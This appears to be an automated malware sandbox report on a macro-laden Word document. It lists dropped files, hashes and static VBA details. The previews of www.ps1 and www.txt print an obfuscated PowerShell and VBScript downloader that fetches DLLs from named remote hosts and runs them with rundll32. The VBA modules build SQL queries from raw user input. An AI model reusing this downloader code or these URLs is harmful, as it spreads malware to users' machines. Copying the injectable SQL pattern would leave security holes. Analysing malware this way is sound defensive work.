                                                                                              SSDEEP:3:bDuMJlOhVIzCmX1DLzCv:bClIzlzs
                                                                                              MD5:C77D8A0B970AA8CD5E9C8A2A633D2017
                                                                                              SHA1:2D08EBEA4F4B15E71BAB05A2AD2B3F5C58554277
                                                                                              SHA-256:8BF29712207B789BA72E60B7DBEC5A07AE731C254B696D763A6776BF7FCC88B1
                                                                                              SHA-512:F05B3B4E1C5924B2E77E9768381873E3002ACD19F21C6B280B3E7F221FE70D50174C8D10BB4AF0620939BA6607E1BA25AE4FDDCEAECB6F98E1300D07847C9834
                                                                                              Malicious:false
                                                                                              Preview: [folders]..Templates.LNK=0..sample.doc.LNK=0..[doc]..sample.doc.LNK=0..
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample.doc.LNK
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 01:39:16 2021, mtime=Fri Nov 26 01:39:16 2021, atime=Fri Nov 26 01:39:20 2021, length=229888, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):1014
                                                                                              Entropy (8bit):4.51966511344641
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:8K/XTkZvQhG1lRzecNlRsDv3qKl4Qd7Qy:8K/XTUIIlRzTNlRDKl4Uj
                                                                                              MD5:24990F42BF960D1887DAD884A503A870
                                                                                              SHA1:DBB358E40600F9D5548C8A12C27B55F1F665906E
                                                                                              SHA-256:289E7A949FF16F4EFDA52D5D849A02006DB6EE79000DBEFAAFC0A48C40749DAB
                                                                                              SHA-512:437980B54D95F615A816AFF53D9136E8F15D17DCC9A36CCCDE4D6712C7B6BE2F9EC96933C30B20216046C67687D579298541AA6B34F2352CAFA1167A8C858CCC
                                                                                              Malicious:false
                                                                                              Preview: L..................F.... ...YR=.n...YR=.n.......n................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S"...user.8......QK.X.S".*...&=....U...............A.l.b.u.s.....z.1.....zS....Desktop.d......QK.XzS..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....zS.. .SAMPLE~1.DOC..J......zS..zS..*.........................s.a.m.p.l.e...d.o.c...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\701188\Users.user\Desktop\sample.doc.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e...d.o.c...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......701188..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):162
                                                                                              Entropy (8bit):2.5038355507075254
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                              Malicious:false
                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):8016
                                                                                              Entropy (8bit):3.576574774824662
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:chQCsMqLqvsqvJCwoo4z8hQCsMqLqvsEHyqvJCwore4zj9Y0H74F2+nlUVq4A2:c6+obz86WHnortzjAF2+mA2
                                                                                              MD5:5E14B167E03C155C1114041459FB27ED
                                                                                              SHA1:011646BD83E9DC58E812E4BF20405944F1647979
                                                                                              SHA-256:4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
                                                                                              SHA-512:318540E69F07FE40C45AFE63542008966E90D419751B51AB736C7C86164B21E8051C4BB6202C2D4524857FDB1150244E857EC2BC007BE96DA194061628C8C912
                                                                                              Malicious:false
                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CDOKOHSTDD9BH9UY8W35.temp
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):8016
                                                                                              Entropy (8bit):3.576574774824662
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:chQCsMqLqvsqvJCwoo4z8hQCsMqLqvsEHyqvJCwore4zj9Y0H74F2+nlUVq4A2:c6+obz86WHnortzjAF2+mA2
                                                                                              MD5:5E14B167E03C155C1114041459FB27ED
                                                                                              SHA1:011646BD83E9DC58E812E4BF20405944F1647979
                                                                                              SHA-256:4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
                                                                                              SHA-512:318540E69F07FE40C45AFE63542008966E90D419751B51AB736C7C86164B21E8051C4BB6202C2D4524857FDB1150244E857EC2BC007BE96DA194061628C8C912
                                                                                              Malicious:false
                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                              C:\Users\user\AppData\Roaming\www.ps1
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1455
                                                                                              Entropy (8bit):5.3208532483583255
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:N6TdXzdU4odZVG6TdCTe4NodZVG6TdNgGodZVG6TdHICmodZVG6TdY8odv:CzuVbVYHCbVLgHbVhICnbVyR1
                                                                                              MD5:2311EE4F9DE83188EF324AB2ACF84CB4
                                                                                              SHA1:0A38AF25D5319830C05A862FEEAA1E75F52D2969
                                                                                              SHA-256:6221BB6E0CBB8160161DE0B384FAA6124BD43FA985C16597BDEE6DEB4FDAC3C7
                                                                                              SHA-512:89871487A1677BCFD10E3EE487AB781A72EFDCBEB3EEF1C9540B212775EF774729A7A933BBF620B42B1834B19E30EAE7B7D48410977C54966CA8B8996E3FA81F
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\www.ps1, Author: Joe Security
                                                                                              Preview: start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr=
                                                                                              C:\Users\user\AppData\Roaming\www.txt
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):655
                                                                                              Entropy (8bit):5.463013231984915
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:leka9OeYUTXvWdrs6po8hMknZSfargLrZSfaQgq+rZSfapgXZSfaRggIfNUZSfac:3GAdKCBgVqxajgTg9No1da
                                                                                              MD5:9C47EAA0A6D17B58D4BB72912DDD12EB
                                                                                              SHA1:86A198833BA77CABEA2923D6F6DF3499109C4524
                                                                                              SHA-256:29757901313239CEFC88C9075793064D0CDC956B373792949582C97E5115D508
                                                                                              SHA-512:A9BE6921D20868D7FF2F4429C586897D68FBF3D891E5429E718176AE224311995E921021439319C2D5A48A81A94D51519D39125A90964FBE84DCB07F904E0974
                                                                                              Malicious:true
                                                                                              Preview: Dim WAITPLZ, WS..WAITPLZ = DateAdd(Chr(115), 2, Now())..Do Until (Now() > WAITPLZ)..Loop..On Error Resume Next..BB="Powershell"..CC=" -ExecutionPolicy Bypass"..SS=" & "..FF="%AppData%\www.ps1"..OK = BB+CC+QQ+SS+FF..Set Ran = CreateObject("WScript.Shell")..Ran.Run OK,0..WScript.Sleep(11000)..OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"..Ran.Run OK1,0..OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"..Ran.Run OK2,0..OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"..Ran.Run OK3,0..OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"..Ran.Run OK4,0..OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"..Ran.Run OK5,0....
                                                                                              C:\Users\user\Desktop\~$mple.doc.doc
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):162
                                                                                              Entropy (8bit):2.5038355507075254
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                              Malicious:false
                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: x, Template: Normal, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Tue Sep 14 08:05:00 2021, Last Saved Time/Date: Mon Nov 22 08:31:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
                                                                                              Entropy (8bit):6.880276075478732
                                                                                              TrID:
                                                                                              • Microsoft Word document (32009/1) 35.95%
                                                                                              • Microsoft Excel sheet (30009/1) 33.71%
                                                                                              • Microsoft Word document (old ver.) (19008/1) 21.35%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 8.99%
                                                                                              File name:sample.doc.doc
                                                                                              File size:216577
                                                                                              MD5:6be56f977b6692fb6ce5f94e110664e3
                                                                                              SHA1:f4d5ce35c656e0f156a2ced453a964faabef09fb
                                                                                              SHA256:ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
                                                                                              SHA512:15252a12c860af4afbf300a33d4e2c984535f9837b0b41f0a7fde378a13c8560fd38813d8e3e0a02bb5d11bab3ae1a1490fc44b3b4eacbff5d1cd89cbb60a001
                                                                                              SSDEEP:3072:i1Ew9u9qLF0EYouFCoOVayLUqjk5efg/kmkt9Qpkmkt9QaRhQnfkmkt9Q:i1EJoEouaLI5efnLbRhQnc
                                                                                              File Content Preview:........................>...............................................................r......................................................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1

                                                                                              OLE File "sample.doc.doc"

                                                                                              Indicators

                                                                                              Has Summary Info:True
                                                                                              Application Name:Microsoft Office Word
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:True
                                                                                              Contains Workbook/Book Stream:False
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:
                                                                                              Flash Objects Count:
                                                                                              Contains VBA Macros:True

                                                                                              Summary

                                                                                              Code Page:1252
                                                                                              Title:
                                                                                              Subject:
                                                                                              Author:x
                                                                                              Keywords:
                                                                                              Comments:
                                                                                              Template:Normal
                                                                                              Last Saved By:Windows User
                                                                                              Revion Number:3
                                                                                              Total Edit Time:180
                                                                                              Create Time:2021-09-14 07:05:00
                                                                                              Last Saved Time:2021-11-22 08:31:00
                                                                                              Number of Pages:1
                                                                                              Number of Words:0
                                                                                              Number of Characters:2
                                                                                              Creating Application:Microsoft Office Word
                                                                                              Security:0

                                                                                              Document Summary

                                                                                              Document Code Page:-535
                                                                                              Number of Lines:1
                                                                                              Number of Paragraphs:1
                                                                                              Thumbnail Scaling Desired:False
                                                                                              Company:SPecialiST RePack
                                                                                              Contains Dirty Links:False
                                                                                              Shared Document:False
                                                                                              Changed Hyperlinks:False
                                                                                              Application Version:1048576

                                                                                              Streams with VBA

                                                                                              VBA File Name: Module1.vba, Stream Size: 9376
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module1
                                                                                              VBA File Name:Module1.vba
                                                                                              Stream Size:9376
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 01 f0 00 00 00 8c 06 00 00 d4 00 00 00 c0 01 00 00 ff ff ff ff 95 06 00 00 09 1d 00 00 00 00 00 00 01 00 00 00 80 e0 cf c6 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module1"
                                                                                              Option Explicit
                                                                                                  Global con As ADODB.Connection
                                                                                                  Global rs As ADODB.Recordset
                                                                                              
                                                                                              Public Sub Connect_Student_Trans1()
                                                                                                  On Error Resume Next
                                                                                                  Set con = New ADODB.Connection
                                                                                                  con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                                  'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLEXPRESS"
                                                                                                  End Sub
                                                                                              
                                                                                              'Public Sub View_Student_Trans1()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid2.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub Edit_Book_Tran()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " &     "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                  frmTrans1.txtTitle.Text = rs!Title
                                                                                                  frmTrans1.txtAuthor.Text = rs!Author
                                                                                                  frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub View_StudentS_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSea.Text = "ID" Then
                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Lastname" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Course" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Book1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then
                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSBook.Text = "Book Name" Then
                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Datagrid_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " &     "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtID.Text = rs!ID
                                                                                                  frmTrans1.lblname.Caption = rs!Firstname
                                                                                                  frmTrans1.lblmi.Caption = rs!MI
                                                                                                  frmTrans1.lbllast.Caption = rs!Lastname
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Display_borrower()
                                                                                                 Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.Datagrid3.DataSource = rs
                                                                                              
                                                                                               End Sub
                                                                                              
                                                                                              'Public Sub View_Trans3()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid5.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub View_Trans3result()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub OkBorrowed()
                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" &                 "'" & frmTrans1.txtID.Text & "'," &                 "'" & frmTrans1.txtCall_no.Text & "'," &                 "'" & frmTrans1.txtTitle.Text & "'," &                 "'" & frmTrans1.txtAuthor.Text & "'," &                 "'" & frmTrans1.txtACC.Text & "'," &                 "'" & frmTrans1.txtBorrow.Text & "'," &                 "'" & frmTrans1.txtDue.Text & "'," &                 "'" & frmTrans1.txtReturned.Text & "'," &                 "'" & frmTrans1.txtRemarks.Text & "')"
                                                                                                  frmTrans1.palen.Caption = 1
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Display_list()
                                                                                                Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " &     "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                               frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                               frmTrans1.txtTitle.Text = rs!Title
                                                                                               frmTrans1.txtAuthor.Text = rs!Author
                                                                                               frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Returned()
                                                                                               Set rs = New ADODB.Recordset
                                                                                                       rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                       frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                       frmTrans1.txtTitle.Text = rs!Title
                                                                                                       frmTrans1.txtAuthor.Text = rs!Author
                                                                                                       frmTrans1.txtACC.Text = rs!Acc_no
                                                                                                       frmTrans1.txtBorrow.Text = rs!Date_Borrowed
                                                                                                       frmTrans1.txtDue.Text = rs!Date_Due
                                                                                                       frmTrans1.txtReturned.Text = rs!Date_Returned
                                                                                                       frmTrans1.txtRemarks.Text = "Returned"
                                                                                               End Sub
                                                                                              
                                                                                              Public Sub Returned1()
                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " &                 "Call_no = '" & frmTrans1.txtCall_no.Text & "', " &                 "Title = '" & frmTrans1.txtTitle.Text & "', " &                 "Author='" & frmTrans1.txtAuthor.Text & "', " &                 "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " &                 "Date_Due='" & frmTrans1.txtDue.Text & "', " &                 "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " &                 "Status = '" & frmTrans1.txtRemarks.Text & "'" &                 "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Delete()
                                                                                                  con.Execute "Delete from dbo.Tbl_TRANSACTION" &         " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"
                                                                                              End Sub
                                                                                              VBA File Name: Module2.vba, Stream Size: 9376
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module2
                                                                                              VBA File Name:Module2.vba
                                                                                              Stream Size:9376
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 01 f0 00 00 00 8c 06 00 00 d4 00 00 00 c0 01 00 00 ff ff ff ff 95 06 00 00 09 1d 00 00 00 00 00 00 01 00 00 00 80 e0 50 2e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module2"
                                                                                              Option Explicit
                                                                                                  Global con As ADODB.Connection
                                                                                                  Global rs As ADODB.Recordset
                                                                                              
                                                                                              Public Sub Connect_Student_Trans1()
                                                                                                  On Error Resume Next
                                                                                                  Set con = New ADODB.Connection
                                                                                                  con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                                  'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLEXPRESS"
                                                                                                  End Sub
                                                                                              
                                                                                              'Public Sub View_Student_Trans1()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid2.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub Edit_Book_Tran()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " &     "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                  frmTrans1.txtTitle.Text = rs!Title
                                                                                                  frmTrans1.txtAuthor.Text = rs!Author
                                                                                                  frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub View_StudentS_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSea.Text = "ID" Then
                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Lastname" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Course" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
